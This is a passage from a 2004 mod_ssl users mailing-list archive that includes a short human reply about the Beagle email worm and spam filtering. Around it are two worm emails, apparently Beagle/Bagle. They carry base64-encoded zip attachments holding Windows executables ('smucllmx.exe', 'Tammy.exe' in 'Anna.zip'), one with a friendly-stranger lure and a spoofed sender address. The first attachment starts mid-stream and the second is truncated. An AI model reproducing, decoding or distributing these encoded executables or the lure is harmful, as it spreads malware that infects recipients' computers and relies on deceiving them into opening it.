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
AAEAAQA6AAAATUQAAAAA

----------wgiomoxkerotxlsjpsds--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 20:27:57 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 65134A8A53; Mon,  1 Mar 2004 20:27:57 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-1021150.0x50a3cb26.arcnxx16.customer.tele.dk [80.163.203.38])
	by master.modssl.org (Postfix) with ESMTP id 29BF8A8A49
	for ; Mon,  1 Mar 2004 20:27:45 +0100 (CET)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 3CD635E0243; Mon,  1 Mar 2004 20:27:48 +0100 (CET)
Date: Mon, 1 Mar 2004 20:27:48 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Re[2]: rse has beagle-a virus ?
Message-ID: <20040301192748.GB12877@gw>
Mail-Followup-To: modssl-users@modssl.org
References: <4EAB3F5D46284A408F6A998255B1188103206542@COMAL.uanet.edu> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Mar 01, 2004 at 01:59:29PM -0500, Cliff Woolley wrote:
> Not to mention that my primary email address is jwoolley@virginia.EDU.
> But you know, feel free to block me if you like.  All the less stuff for
> me to worry about.  ;)  hehe.  Here's a revolutionary little idea... if
> you don't like spam and email worms... how about (gasp) installing
> SpamAssassin and some antivirus software.  :-P
> 
Unplugging the network cable worked well to make NT4 secure up to the c2
level - I'm pretty sure that a similar trick would be quite efficient in
avoiding spam ;)

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 21:23:08 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 07A36A8A61; Mon,  1 Mar 2004 21:23:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from GAVINN (wbar5.dal1-4-12-165-169.dsl-verizon.net [4.12.165.169])
	by master.modssl.org (Postfix) with SMTP id BA502A8A53
	for ; Mon,  1 Mar 2004 21:23:01 +0100 (CET)
Date: Mon, 01 Mar 2004 14:24:34 -0600
To: modssl-users@modssl.org
Subject: Mary
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------bocyykfeqctdbmkxrbht"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------bocyykfeqctdbmkxrbht
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

I love meeting new people and making new friends. I am a Mary Kay Beauty Consultant. I am married to a wonderful man. We have no children, exept for a minature schnauzer that thinks he is a child. Looking forward to meeting you. 

----------bocyykfeqctdbmkxrbht
Content-Type: application/octet-stream; name="Anna.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Anna.zip"

UEsDBAoAAAAAAKBuYTAjxVpV4lsAAOJbAAAJAAAAVGFtbXkuZXhlTVqQAAMAAAAEAAAA//8A
ALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4A
tAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAA
AAAAAADOonn7isMXqIrDF6iKwxeoisMXqInDF6gE3ASousMXqGLcEqiLwxeoduMFqIvDF6hN
xRGoi8MXqFJpY2iKwxeoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQAAAAAAAAAA
AAAAAADgAA8BCwEAAAAOAAAAgAAAAAAAAACwAAAAEAAAACAAAAAAQAAAEAAAAAIAAAQAAAAA
AAAABAAAAAAAAAAAAAEAAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAA
AAAAAAAxsgAA0QAAAACgAABgDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAKwAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAgAAAAADgAAAAAAAAQNAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA
AADAAAYAAAAAAACKBAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAwABmAAAAAAAA9GgA
AAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAGAPAAAAoAAAABAAAAAEAAAA
AAAAAAAAAAAAAQBAAADAAAAAAAAAAAAAUAAAALAAAABEAAAAFAAAAAAAAAAAAAAAAAAAQAAA
wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAD
AAAAIAAAgA4AAAA4AACAAAAAAAAAAAAAAAAAAAABAAEAAABQAACAAAAAAAAAAAAAAAAAAAAB
AAEAAABoAACAAAAAAAAAAAAAAAAAAAABAAAAAACAAAAAAAAAAAAAAAAAAAAAAAABAAAAAACQ
AAAAoKAAAKgOAAAAAAAAAAAAAEivAAAUAAAAAAAAAAAAAAAoAAAAMAAAAGAAAAABAAgAAAAA
AIAKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP///wAAAAAAnP//AKX//wCt//8Atf//AL3//wDG
//8Azv//ANb//wDe//8A5///AO///wD3//8AjPv/AJT7/wCt+/8Ae+/3AIz3/wDG+/8Azvv/
AITz/wCM8/8AnO/3AKX3/wC19/8A1vv/AHPn9wCE7/8AnPP/AN77/wBKz+cAY9vvAHvr/wCM
7/8AjOf3AK3z/wBaz+cAa9/3AITr/wCc7/8Ape//ALXz/wDO9/8A5/v/ADm+3gBCx+cAa8/n
AITn/wCU6/8AjNvvAM7v9wAptt4AMbreADGevQBSz+8AWs/vAGPX9wBr0+8Ae+P/AHvP5wCM
5/8Aref3ALXv/wDG8/8AAJ7OAACWxgAIns4ACJK9AAiKtQAQptYAGKrWABiOtQAhst4AKbLe
ACmu1gAhhqUAOb7nADGCnABKut4AUr7eAFq+3gBz3/8Ae9//AITP5wCl4/cArd/vAL3v/wDG
6/cA3vf/AACazgAAksYACI69ABCi1gAQns4AEH2lABiq3gAYptYAIabWABh5nAAhos4AKa7e
ACGKrQAxtucAMbLeADmy3gBCw+8AKXmUAEK23gBKw+8ASrbeAFrP9wBSut4AOX2UAFrD5wBr
1/8Aa9P3AGO+3gBz2/8Aa8fnAHPP7wB7y+cAhNPvAJzf9wCl5/8ApdvvAO/7/wAhqt4AKare
AEKy3gBSx/cAUr7nAGPT/wBavucAY8fvAHPX/wBrw+cAe9P3AITX9wCM0+8AnNfvAL3n9wDG
7/8A1vP/AGPP/wBr0/8AnNv3ALXj9wBKvvcAY8v/AJTX9wCt3/cAzu//AOf3/wC94/cA3vP/
ANbv/wDv9/8A9/v/AP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbGxsbGwAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbcX5iW0ZsbGxsAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbY32SloNoYVtdZGxsbAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbZn2SkpGRkZGRbktCXGBsbGwAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABbZn10dHR0dHR0dHR0hW5LR1tsbGxsAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAABbgECIiIiIiIiIiIiIiIhTU3SDaGFbbGxsbAAAAAAAAAAAAAAAAAAA
AAAAAAAAAABbgFh3d3d3d3d3d3d3d3d3d1NTU1RUcE5KQmxsbGwAAAAAAAAAAAAAAAAAAAAA
AABbgI9TU1NTU1NTU1NTU1NTU1RUVFRUVFRUVDprS15sAAAAAAAAAAAAAAAAAAAAAABbgI88
PDw8PDw8PDw8PDw8PDw8PDw8PDw8PDw8PHU5bAAAAAAAAAAAAAAAAAAAAABbgEE+PDw8PDw8
PDw8PDw8PDw8PDw8PDw8PDw8PDyVbAAAAAAAAAAAAAAAAAAAAABbgFYyMTExMTExMTExMTEx
MTExMTExMTExMTExMTGVbAAAAAAAAAAAAAAAAAAAAFuAgJMyKCgoKCgoKCgoKCgoKCgoKCgo
KCgoKCgoKCiRW2wAAAAAAAAAAAAAAAAAAFuAgJMpHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0d
HR2RW2wAAAAAAAAAAAAAAAAAAFuAgHwlIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyORS2wA
AAAAAAAAAAAAAAAAAFuBgXkrFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxeRS2wAAAAAAAAA
AAAAAAAAAFtpaXgaExMTExMTExMTExMTExMTExMTExMTExMTExORJk8AAAAAAAAAAAAAAAAA
AFuEhHgaEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBCRO01sAAAAAAAAAAAAAAAAAFuEhHgs
EBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBCRJElsAAAAAAAAAAAAAAAAAFuGhm0VAwMDAwMD
AwMDAwMDAwMDAwMDAwMDAwMDAwORGEVsAAAAAAAAAAAAAAAAAFtzh2obAwMDAwMDAwMDAwMD
AwMDAwMDAwMDAwMDAwORCVtsAAAAAAAAAAAAAAAAAFt7imobBAQEBAQEBAQEBAQEBAQEBAQE
BAQEBAQEBASRCURsAAAAAAAAAAAAAAAAAFuXikQtBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQWRCmlsAAAAAAAAAAAAAAAAAFuXi0R/CQcGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgaRC1Fy
AAAAAAAAAAAAAAAAAFuTKkRSmX9/LR8bCQkIBwcHBwcHBwcHBwcHBwcHBweRCzBPbAAAAAAA
AAAAAAAAAFuYKic1W0RqiXuUmn9/LQgICAgICAgICAgICAgICAiRDDNnbAAAAAAAAAAAAAAA
AFuQHhcXFyInLzVIW0RQWQ0KCQkJCQkJCQkJCQkJCQmRDT9JbAAAAAAAAAAAAAAAAFuQGRAQ
EBAQEBAQEBw4RFkNCwsLCwsLCwsLCwsLCwuRDZBDbAAAAAAAAAAAAAAAAFtaEQMDAwMDAwMD
AwMDL0SeDg4NDQwMDAwMDAwMDAyRDg5bbAAAAAAAAAAAAAAAAFuaBQMDAwMDAwMDAwMDAy5f
aj2MjpwBAQ4ODg4NDQ2RAQFfbAAAAAAAAAAAAAAAAFuaFAMDAwMDAwMDAwMDBAMSISA2Sltb
TGo9jY5/AQGQAQFqbAAAAAAAAAAAAAAAAFuNLQMDAwMDAwMDAwMFLX8fGwgHBQMPHCEgNkpb
W4JEREREbAAAAAAAAAAAAAAAAABbmggDAwMDAwMDAwMtWWpvenuUnZ+fHwoIBgUDFhxbAAAA
AAAAAAAAAAAAAAAAAABbeg0DAwMDAwMDAwqaZVsAAFtbW1tbanh6V5sODQtEAAAAAAAAAAAA
AAAAAAAAAAAAX54BAQwMCQgGCAFQWwAAAAAAAAAAW1tbW1tbW1sAAAAAAAAAAAAAAAAAAAAA
AAAAW2OCdlWMjjQBAYxbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABb
W1tbW1tbWzcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AP///////wAA////////AAD///////8AAP///////wAA////////AAD///////8AAP8H////
/wAA/gB/////AAD+AAf///8AAP4AAH///wAA/gAAB///AAD+AAAAf/8AAP4AAAAH/wAA/gAA
AAP/AAD+AAAAAf8AAP4AAAAB/wAA/gAAAAH/AAD8AAAAAP8AAPwAAAAA/wAA/AAAAAD/AAD8
AAAAAP8AAPwAAAAA/wAA/AAAAAB/AAD8AAAAAH8AAPwAAAAAfwAA/AAAAAB/AAD8AAAAAH8A
APwAAAAAfwAA/AAAAAB/AAD8AAAAAD8AAPwAAAAAPwAA/AAAAAA/AAD8AAAAAD8AAPwAAAAA
PwAA/AAAAAA/AAD8AAAAAD8AAPwAAAAAPwAA/gAAAAP/AAD+AAMAA/8AAP8AB/gH/wAA/wAP
////AAD/wB////8AAP///////wAA////////AAD///////8AAP///////wAA////////AAD/
//////8AAAAAAQABADAwAAABABgAqA4AAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABg6AEAAADog8QE6AEAAADpXYHt2SFAAOgE
AgAA6OsI6wLNIP8kJJpmvlJH6AEAAACaWY2VKyJAAOgBAAAAaVhmv01K6L8BAACNUvnoAQAA
